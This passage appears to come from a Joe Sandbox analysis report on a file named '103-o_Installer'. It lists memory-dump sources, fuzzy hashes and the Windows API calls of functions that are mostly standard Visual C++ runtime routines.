                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction ID: 00208d29992e8559afa86a90a9c0351e77f58fc58aea0b00a2731e66495d0714
                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction Fuzzy Hash: 2FC1A273D0A5F249873B852D44182BFEE626E81B8831FC391DED43F999C627AD01D6D0
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction ID: 5d6fe426a8b5fafea817b616cca50a81fdb924956d720f187276ad537caca4d7
                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction Fuzzy Hash: 7BC18F73D0E5F2498B3B452D04183BFEE616E81B8831BC391DED43F989CA27AD1599D0
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                • Instruction ID: 6832a8316c24b7048a88756ab67a923a22bffa2497096e30f24f85f014cb0326
                • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                • Instruction Fuzzy Hash: 32B1B733D0A5F24A877B412E44583BFEEA26E91B8831FC391CDD43F999C6279D0596D0
                Memory Dump Source
                • Source File: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2ed0000_103-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                • Instruction ID: 50e7ff81c99bb5d4346660dedc50dc25b8d3fc3827506e7791932f910191457d
                • Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                • Instruction Fuzzy Hash: 90F06D72240205AFCF158F48DC41EAA77E9EF08364B488069FD0ADB221E331FD609BC0
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
                • Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
                • Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
                • Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,003A5A5E), ref: 003A98ED
                • __mtterm.LIBCMT ref: 003A98F9
                  • Part of subcall function 003A9632: DecodePointer.KERNEL32(00000002,003A9A5B,?,003A5A5E), ref: 003A9643
                  • Part of subcall function 003A9632: TlsFree.KERNEL32(00000002,003A9A5B,?,003A5A5E), ref: 003A965D
                  • Part of subcall function 003A9632: DeleteCriticalSection.KERNEL32(00000000,00000000,77755810,?,003A9A5B,?,003A5A5E), ref: 003AB6A4
                  • Part of subcall function 003A9632: _free.LIBCMT ref: 003AB6A7
                  • Part of subcall function 003A9632: DeleteCriticalSection.KERNEL32(00000002,77755810,?,003A9A5B,?,003A5A5E), ref: 003AB6CE
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003A990F
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003A991C
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003A9929
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003A9936
                • TlsAlloc.KERNEL32(?,003A5A5E), ref: 003A9986
                • TlsSetValue.KERNEL32(00000000,?,003A5A5E), ref: 003A99A1
                • __init_pointers.LIBCMT ref: 003A99AB
                • EncodePointer.KERNEL32(?,003A5A5E), ref: 003A99BC
                • EncodePointer.KERNEL32(?,003A5A5E), ref: 003A99C9
                • EncodePointer.KERNEL32(?,003A5A5E), ref: 003A99D6
                • EncodePointer.KERNEL32(?,003A5A5E), ref: 003A99E3
                • DecodePointer.KERNEL32(003A97B6,?,003A5A5E), ref: 003A9A04
                • __calloc_crt.LIBCMT ref: 003A9A19
                • DecodePointer.KERNEL32(00000000,?,003A5A5E), ref: 003A9A33
                • GetCurrentThreadId.KERNEL32 ref: 003A9A45
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                • API String ID: 3698121176-3819984048
                • Opcode ID: 9cf8f55c1e5c1bc4935b110efedad1de4a35933f1800aa6e3ae79e6fa21a2cc2
                • Instruction ID: fbaff2ff666ac43f29e5e9ddcdb3d0f90b3a9e26e9d53ad7aa8ee7a906974747
                • Opcode Fuzzy Hash: 9cf8f55c1e5c1bc4935b110efedad1de4a35933f1800aa6e3ae79e6fa21a2cc2
                • Instruction Fuzzy Hash: 1D318471901750DEEB27AF75AC0AF5A3BACEB86364F01061BE624E61B1DB35A840CF50
                APIs
                • __EH_prolog.LIBCMT ref: 003A2364
                • std::_Lockit::_Lockit.LIBCPMT ref: 003A2373
                • int.LIBCPMT ref: 003A238A
                  • Part of subcall function 003A1035: std::_Lockit::_Lockit.LIBCPMT ref: 003A1046
                • std::bad_exception::bad_exception.LIBCMT ref: 003A23C1
                • __CxxThrowException@8.LIBCMT ref: 003A23CF
                • std::locale::facet::_Incref.LIBCPMT ref: 003A23DF
                • std::locale::facet::_Facet_Register.LIBCPMT ref: 003A23E5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
                • String ID: P+t$bad cast
                • API String ID: 878426289-486246024
                • Opcode ID: 0ae37dad237168dc9bb41dca3c703872d5f26dee6d63a09434c44d1252cfff87
                • Instruction ID: 6787670d1a12857793f8a5c21632bf9068397c61c4a0368f6d6242d4cac1985d
                • Opcode Fuzzy Hash: 0ae37dad237168dc9bb41dca3c703872d5f26dee6d63a09434c44d1252cfff87
                • Instruction Fuzzy Hash: D0115E36900214ABCF0BFB64DC42AEEB375EB93724F150619F511AB2D1DB749A058B90
                APIs
                • __EH_prolog.LIBCMT ref: 003A1E33
                • std::_Lockit::_Lockit.LIBCPMT ref: 003A1E42
                • int.LIBCPMT ref: 003A1E59
                  • Part of subcall function 003A1035: std::_Lockit::_Lockit.LIBCPMT ref: 003A1046
                • std::bad_exception::bad_exception.LIBCMT ref: 003A1E90
                • __CxxThrowException@8.LIBCMT ref: 003A1E9E
                • std::locale::facet::_Incref.LIBCPMT ref: 003A1EAE
                • std::locale::facet::_Facet_Register.LIBCPMT ref: 003A1EB4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
                • String ID: bad cast$*t
                • API String ID: 878426289-263781451
                • Opcode ID: 0c4b1c68ed757d0be1e42a5d9de456790eeb9422f1d5aa828ab14f81c3409c62
                • Instruction ID: 5b50034053f930b17b97dcffe71f0127b3c5bda854c9210de2933a04609981d7
                • Opcode Fuzzy Hash: 0c4b1c68ed757d0be1e42a5d9de456790eeb9422f1d5aa828ab14f81c3409c62
                • Instruction Fuzzy Hash: A5117036901214ABCF07FB60D942EEEB375EB92725F150219F521AB1D1DF749A05CB90
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,003BD638,00000008,003A9777,00000000,00000000,?,?,003AA964,003A4478,?,?,003A3C7B,?,?,003A101C), ref: 003A9680
                • __lock.LIBCMT ref: 003A96B4
                  • Part of subcall function 003AB7B7: __mtinitlocknum.LIBCMT ref: 003AB7CD
                  • Part of subcall function 003AB7B7: __amsg_exit.LIBCMT ref: 003AB7D9
                  • Part of subcall function 003AB7B7: EnterCriticalSection.KERNEL32(00000000,00000000,?,003A96B9,0000000D), ref: 003AB7E1
                • InterlockedIncrement.KERNEL32(?), ref: 003A96C1
                • __lock.LIBCMT ref: 003A96D5
                • ___addlocaleref.LIBCMT ref: 003A96F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                • String ID: KERNEL32.DLL$`+t
                • API String ID: 637971194-3896753724
                • Opcode ID: 9c10ddafa6198fb33dd6fb9f5f19326fa3899f8b67cf0d58ebdf079c77c42e29
                • Instruction ID: afb935e1b304be706edeb12eceecb5ab49a423e8ffdc36fbb0c1a6b3b0cd2a4d
                • Opcode Fuzzy Hash: 9c10ddafa6198fb33dd6fb9f5f19326fa3899f8b67cf0d58ebdf079c77c42e29
                • Instruction Fuzzy Hash: 64018471804B00DFD722EF69C845789FBF0EF51324F10850EE59A5A7A1CBB4A644CF11
                APIs
                • __getptd_noexit.LIBCMT ref: 003A741A
                  • Part of subcall function 003A9723: GetLastError.KERNEL32(?,?,003AA964,003A4478,?,?,003A3C7B,?,?,003A101C), ref: 003A9727
                  • Part of subcall function 003A9723: ___set_flsgetvalue.LIBCMT ref: 003A9735
                  • Part of subcall function 003A9723: __calloc_crt.LIBCMT ref: 003A9749
                  • Part of subcall function 003A9723: DecodePointer.KERNEL32(00000000,?,?,003AA964,003A4478,?,?,003A3C7B,?,?,003A101C), ref: 003A9763
                  • Part of subcall function 003A9723: GetCurrentThreadId.KERNEL32 ref: 003A9779
                  • Part of subcall function 003A9723: SetLastError.KERNEL32(00000000,?,?,003AA964,003A4478,?,?,003A3C7B,?,?,003A101C), ref: 003A9791
                • __calloc_crt.LIBCMT ref: 003A743C
                • __get_sys_err_msg.LIBCMT ref: 003A745A
                • _strcpy_s.LIBCMT ref: 003A7462
                • __invoke_watson.LIBCMT ref: 003A7477
                Strings
                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 003A7427, 003A744A
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                • API String ID: 3117964792-798102604
                • Opcode ID: d398f9e326d4990174e20396f29627e1f575688989bdefddc5a666a58dff91ef
                • Instruction ID: c75e722275470650eefe15aa5e5863a025fa6cf9463a733c71e1b2eabadf008d
                • Opcode Fuzzy Hash: d398f9e326d4990174e20396f29627e1f575688989bdefddc5a666a58dff91ef
                • Instruction Fuzzy Hash: 38F0E07A50C21067DB23392B5CC196B7B9CDB8B768B15047AF745DF541ED219C0182D5
                APIs
                • __EH_prolog.LIBCMT ref: 003A1A86
                • std::_Lockit::_Lockit.LIBCPMT ref: 003A1A98
                • std::exception::exception.LIBCMT ref: 003A1ACF
                  • Part of subcall function 003A3C86: std::exception::_Copy_str.LIBCMT ref: 003A3CA1
                • __CxxThrowException@8.LIBCMT ref: 003A1AE4
                  • Part of subcall function 003A450C: RaiseException.KERNEL32(?,?,003A13AC,?,?,?,?,?,003A13AC,?,003BCCE8,00000000), ref: 003A454E
                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003A1AED
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                • String ID: bad locale name
                • API String ID: 446407826-1405518554
                • Opcode ID: 25c5ddc640dfe3031481023e04622b6a79fabba8bcf8d1622943c1c9dfe9988b
                • Instruction ID: cf59d553ca1ad8aa3aac00aa03c771d2fd204a4220e2611a720888292e7d2b85
                • Opcode Fuzzy Hash: 25c5ddc640dfe3031481023e04622b6a79fabba8bcf8d1622943c1c9dfe9988b
                • Instruction Fuzzy Hash: 0D016DB6805744AECB22EF99C4805CFFFB8FB1A304B40852FE65997641C7749708CBA5
                APIs
                • __getptd.LIBCMT ref: 003A76F1
                  • Part of subcall function 003A979C: __getptd_noexit.LIBCMT ref: 003A979F
                  • Part of subcall function 003A979C: __amsg_exit.LIBCMT ref: 003A97AC
                • __getptd.LIBCMT ref: 003A7702
                • __getptd.LIBCMT ref: 003A7710
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: MOC$RCC$csm
                • API String ID: 803148776-2671469338
                • Opcode ID: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
                • Instruction ID: 79d0e939211720335e8c3af78a544c68544c36d5773b5f60a5f543cfb7e4eddf
                • Opcode Fuzzy Hash: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
                • Instruction Fuzzy Hash: E8E09A351181048FDF23AB68C48AB797798EB4A315F5F54A2E40DCB232C73AED509A92
                APIs
                • __CreateFrameInfo.LIBCMT ref: 003A79BB
                  • Part of subcall function 003A4842: __getptd.LIBCMT ref: 003A4850
                  • Part of subcall function 003A4842: __getptd.LIBCMT ref: 003A485E
                • __getptd.LIBCMT ref: 003A79C5
                  • Part of subcall function 003A979C: __getptd_noexit.LIBCMT ref: 003A979F
                  • Part of subcall function 003A979C: __amsg_exit.LIBCMT ref: 003A97AC
                • __getptd.LIBCMT ref: 003A79D3
                • __getptd.LIBCMT ref: 003A79E1
                • __getptd.LIBCMT ref: 003A79EC
                • _CallCatchBlock2.LIBCMT ref: 003A7A12
                  • Part of subcall function 003A48E7: __CallSettingFrame@12.LIBCMT ref: 003A4933
                  • Part of subcall function 003A7AB9: __getptd.LIBCMT ref: 003A7AC8
                  • Part of subcall function 003A7AB9: __getptd.LIBCMT ref: 003A7AD6
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                • String ID:
                • API String ID: 1602911419-0
                • Opcode ID: 6e64b352859d7320df30e708aad6a0255c9360a7e17b4ae242c315dda40e0762
                • Instruction ID: 46442e78a2427365a18df556f87ec1f1639c19fd982db8d18ec73f4ae237a428
                • Opcode Fuzzy Hash: 6e64b352859d7320df30e708aad6a0255c9360a7e17b4ae242c315dda40e0762
                • Instruction Fuzzy Hash: D811F6B5C00209DFDF01EFA4D846BEE7BB4FF05314F14846AF814AB251DB799A119B64
                APIs
                • __getptd.LIBCMT ref: 003AD230
                  • Part of subcall function 003A979C: __getptd_noexit.LIBCMT ref: 003A979F
                  • Part of subcall function 003A979C: __amsg_exit.LIBCMT ref: 003A97AC
                • __amsg_exit.LIBCMT ref: 003AD250
                • __lock.LIBCMT ref: 003AD260
                • InterlockedDecrement.KERNEL32(?), ref: 003AD27D
                • _free.LIBCMT ref: 003AD290
                • InterlockedIncrement.KERNEL32(00741690), ref: 003AD2A8
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                • String ID:
                • API String ID: 3470314060-0
                • Opcode ID: 7dc4b6887d4c7fc6c3efa2ab26b4cab1e8451b35eaf233b623ebd366cdd5b78a
                • Instruction ID: 6a2691dc2dab8d460baa4ca09767a2dbd45be46dacd825f9a147237abfb80f36
                • Opcode Fuzzy Hash: 7dc4b6887d4c7fc6c3efa2ab26b4cab1e8451b35eaf233b623ebd366cdd5b78a
                • Instruction Fuzzy Hash: AD012233D017209BDB23AF28884179DB3A4FF0A725F064515E926ABA92CB74DD81CBD1
                APIs
                • __EH_prolog.LIBCMT ref: 003A1B0B
                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003A1B1F
                  • Part of subcall function 003A32F5: _setlocale.LIBCMT ref: 003A3307
                • _free.LIBCMT ref: 003A1B2D
                  • Part of subcall function 003A4452: HeapFree.KERNEL32(00000000,00000000,?,003A3C7B,?,?,003A101C), ref: 003A4468
                  • Part of subcall function 003A4452: GetLastError.KERNEL32(?,?,003A3C7B,?,?,003A101C), ref: 003A447A
                • _free.LIBCMT ref: 003A1B3F
                • _free.LIBCMT ref: 003A1B51
                • _free.LIBCMT ref: 003A1B63
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                • String ID:
                • API String ID: 770894815-0
                • Opcode ID: 1351fe3b39953cb4e7b3a6e7dd7d2098fa2dbabe49d0c490f1ef3befa7c8247d
                • Instruction ID: d8914a0c7d931b0517f7c7d99bc46fbc0d40bcee1d0d4e56c927553dd931ea1f
                • Opcode Fuzzy Hash: 1351fe3b39953cb4e7b3a6e7dd7d2098fa2dbabe49d0c490f1ef3befa7c8247d
                • Instruction Fuzzy Hash: F5015E316007009BDB26AF69D506B9BB3E8FF06724F10891EE065DB580DFB8D9048A61
                APIs
                • __CxxThrowException@8.LIBCMT ref: 003A155A
                • std::exception::exception.LIBCMT ref: 003A157C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: Exception@8Throwstd::exception::exception
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 3728558374-1866435925
                • Opcode ID: f415a03068c66869226fe43ccd95f5b7dd8ebcccd41452b3a77f9db5afb41ea9
                • Instruction ID: 3ddf96d88625556e51c27d6562b065f7dc23f7d462fc9bcd75b0a8392df39d6a
                • Opcode Fuzzy Hash: f415a03068c66869226fe43ccd95f5b7dd8ebcccd41452b3a77f9db5afb41ea9
                • Instruction Fuzzy Hash: 0B014CB1C00208AACB07EFA884066EE77E8DB83318F15C51AA6169F502E678CA05CF51
                APIs
                • ___BuildCatchObject.LIBCMT ref: 003A7D53
                  • Part of subcall function 003A7CAE: ___BuildCatchObjectHelper.LIBCMT ref: 003A7CE4
                • _UnwindNestedFrames.LIBCMT ref: 003A7D6A
                • ___FrameUnwindToState.LIBCMT ref: 003A7D78
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                • String ID: csm$csm
                • API String ID: 2163707966-3733052814
                • Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
                • Instruction ID: 211d680000540c96a98f7e19b8bfbded6e2f69e8ee891bf022d9ddcdb740c2bb
                • Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
                • Instruction Fuzzy Hash: CE01EF31405109BBDF23AF51CC86EAB7F6AEF4A360F144014BD1819222D7769AA1EBA1
                APIs
                • _malloc.LIBCMT ref: 003ADE76
                  • Part of subcall function 003A729E: __FF_MSGBANNER.LIBCMT ref: 003A72B7
                  • Part of subcall function 003A729E: __NMSG_WRITE.LIBCMT ref: 003A72BE
                  • Part of subcall function 003A729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003A63C9,00000000,00000001,00000000,?,003AB742,00000018,003BD728,0000000C,003AB7D2), ref: 003A72E3
                • _free.LIBCMT ref: 003ADE89
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
